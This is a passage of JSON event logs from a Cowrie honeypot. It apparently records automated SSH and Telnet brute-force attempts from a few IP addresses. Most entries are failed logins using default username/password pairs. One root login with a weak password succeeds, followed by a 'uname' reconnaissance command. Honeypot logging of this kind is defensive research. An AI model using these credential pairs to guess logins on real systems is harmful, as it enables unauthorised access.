0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:40.502239Z","src_ip":"212.227.125.160","session":"ce3b079d7176"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:40.973559Z","src_ip":"212.227.125.160","session":"ce3b079d7176"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:41.439129Z","src_ip":"212.227.235.229","session":"843d1a079fdb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:41.475466Z","src_ip":"212.227.125.160","session":"5e8f32e48255"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:42.078601Z","src_ip":"212.227.125.160","session":"ce3b079d7176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48422,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1918bd7babe","protocol":"telnet","message":"New connection: 212.227.235.229:48422 (1.2.3.4:23) [session: c1918bd7babe]","sensor":"my-vps","timestamp":"2025-08-28T05:41:50.373828Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56456,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bfa8cc40752","protocol":"ssh","message":"New connection: 212.227.125.160:56456 (1.2.3.4:22) [session: 7bfa8cc40752]","sensor":"my-vps","timestamp":"2025-08-28T05:41:54.686341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:54.726535Z","src_ip":"212.227.125.160","session":"7bfa8cc40752"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:54.806905Z","src_ip":"212.227.125.160","session":"7bfa8cc40752"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:55.222636Z","src_ip":"212.227.125.160","session":"7bfa8cc40752"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:56.329091Z","src_ip":"212.227.125.160","session":"7bfa8cc40752"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41976,"dst_ip":"1.2.3.4","dst_port":22,"session":"972cd372d079","protocol":"ssh","message":"New connection: 212.227.235.229:41976 (1.2.3.4:22) [session: 972cd372d079]","sensor":"my-vps","timestamp":"2025-08-28T05:42:04.977223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:04.978460Z","src_ip":"212.227.235.229","session":"972cd372d079"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:05.122425Z","src_ip":"212.227.235.229","session":"972cd372d079"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T05:42:05.555883Z","src_ip":"212.227.235.229","session":"972cd372d079"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:06.701894Z","src_ip":"212.227.235.229","session":"972cd372d079"}
{"eventid":"cowrie.session.closed","duration":31.85242462158203,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:06.923316Z","src_ip":"212.227.235.229","session":"654cada0a2b7"}
{"eventid":"cowrie.session.closed","duration":32.02737212181091,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:07.108380Z","src_ip":"212.227.235.229","session":"5f4131aefbe7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46384,"dst_ip":"1.2.3.4","dst_port":22,"session":"176f9e6d230c","protocol":"ssh","message":"New connection: 212.227.125.160:46384 (1.2.3.4:22) [session: 176f9e6d230c]","sensor":"my-vps","timestamp":"2025-08-28T05:42:09.405774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:09.539164Z","src_ip":"212.227.125.160","session":"176f9e6d230c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:09.545691Z","src_ip":"212.227.125.160","session":"176f9e6d230c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T05:42:10.855430Z","src_ip":"212.227.125.160","session":"176f9e6d230c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:11.961726Z","src_ip":"212.227.125.160","session":"176f9e6d230c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56416,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d2b5bc959b","protocol":"ssh","message":"New connection: 217.72.205.35:56416 (1.2.3.4:22) [session: 33d2b5bc959b]","sensor":"my-vps","timestamp":"2025-08-28T05:42:17.141020Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:17.142065Z","src_ip":"217.72.205.35","session":"33d2b5bc959b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45872,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e9d62664eb1","protocol":"ssh","message":"New connection: 212.227.235.229:45872 (1.2.3.4:22) [session: 5e9d62664eb1]","sensor":"my-vps","timestamp":"2025-08-28T05:42:17.220987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:17.221645Z","src_ip":"212.227.235.229","session":"5e9d62664eb1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:17.366956Z","src_ip":"212.227.235.229","session":"5e9d62664eb1"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T05:42:17.821213Z","src_ip":"212.227.235.229","session":"5e9d62664eb1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:18.968159Z","src_ip":"212.227.235.229","session":"5e9d62664eb1"}
{"eventid":"cowrie.session.closed","duration":32.366682052612305,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:22.740424Z","src_ip":"212.227.235.229","session":"c1918bd7babe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41168,"dst_ip":"1.2.3.4","dst_port":22,"session":"c62032e241bc","protocol":"ssh","message":"New connection: 212.227.125.160:41168 (1.2.3.4:22) [session: c62032e241bc]","sensor":"my-vps","timestamp":"2025-08-28T05:42:27.789176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:27.789985Z","src_ip":"212.227.125.160","session":"c62032e241bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:27.893690Z","src_ip":"212.227.125.160","session":"c62032e241bc"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:42:28.208646Z","src_ip":"212.227.125.160","session":"c62032e241bc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:29.321272Z","src_ip":"212.227.125.160","session":"c62032e241bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52374,"dst_ip":"1.2.3.4","dst_port":22,"session":"34f983e07c02","protocol":"ssh","message":"New connection: 212.227.235.229:52374 (1.2.3.4:22) [session: 34f983e07c02]","sensor":"my-vps","timestamp":"2025-08-28T05:42:32.913000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:32.913627Z","src_ip":"212.227.235.229","session":"34f983e07c02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:33.062740Z","src_ip":"212.227.235.229","session":"34f983e07c02"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:42:33.496475Z","src_ip":"212.227.235.229","session":"34f983e07c02"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:34.642963Z","src_ip":"212.227.235.229","session":"34f983e07c02"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":58288,"dst_ip":"1.2.3.4","dst_port":23,"session":"a930c4cc5d8f","protocol":"telnet","message":"New connection: 8.222.212.69:58288 (1.2.3.4:23) [session: a930c4cc5d8f]","sensor":"my-vps","timestamp":"2025-08-28T05:42:38.229461Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39568,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac95ba59a8b","protocol":"ssh","message":"New connection: 212.227.125.160:39568 (1.2.3.4:22) [session: dac95ba59a8b]","sensor":"my-vps","timestamp":"2025-08-28T05:42:55.150021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:55.164249Z","src_ip":"212.227.125.160","session":"dac95ba59a8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:55.267015Z","src_ip":"212.227.125.160","session":"dac95ba59a8b"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-28T05:42:55.667720Z","src_ip":"212.227.125.160","session":"dac95ba59a8b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:56.773157Z","src_ip":"212.227.125.160","session":"dac95ba59a8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56552,"dst_ip":"1.2.3.4","dst_port":22,"session":"452fa35bad4b","protocol":"ssh","message":"New connection: 212.227.125.160:56552 (1.2.3.4:22) [session: 452fa35bad4b]","sensor":"my-vps","timestamp":"2025-08-28T05:42:57.484570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:42:57.485617Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:42:57.589293Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:42:57.901953Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:42:58.198868Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:42:58.199628Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:58.304347Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:42:58.305600Z","src_ip":"212.227.125.160","session":"452fa35bad4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39218,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fdcdbef08eb","protocol":"ssh","message":"New connection: 212.227.235.229:39218 (1.2.3.4:22) [session: 8fdcdbef08eb]","sensor":"my-vps","timestamp":"2025-08-28T05:43:04.815476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:04.816282Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.co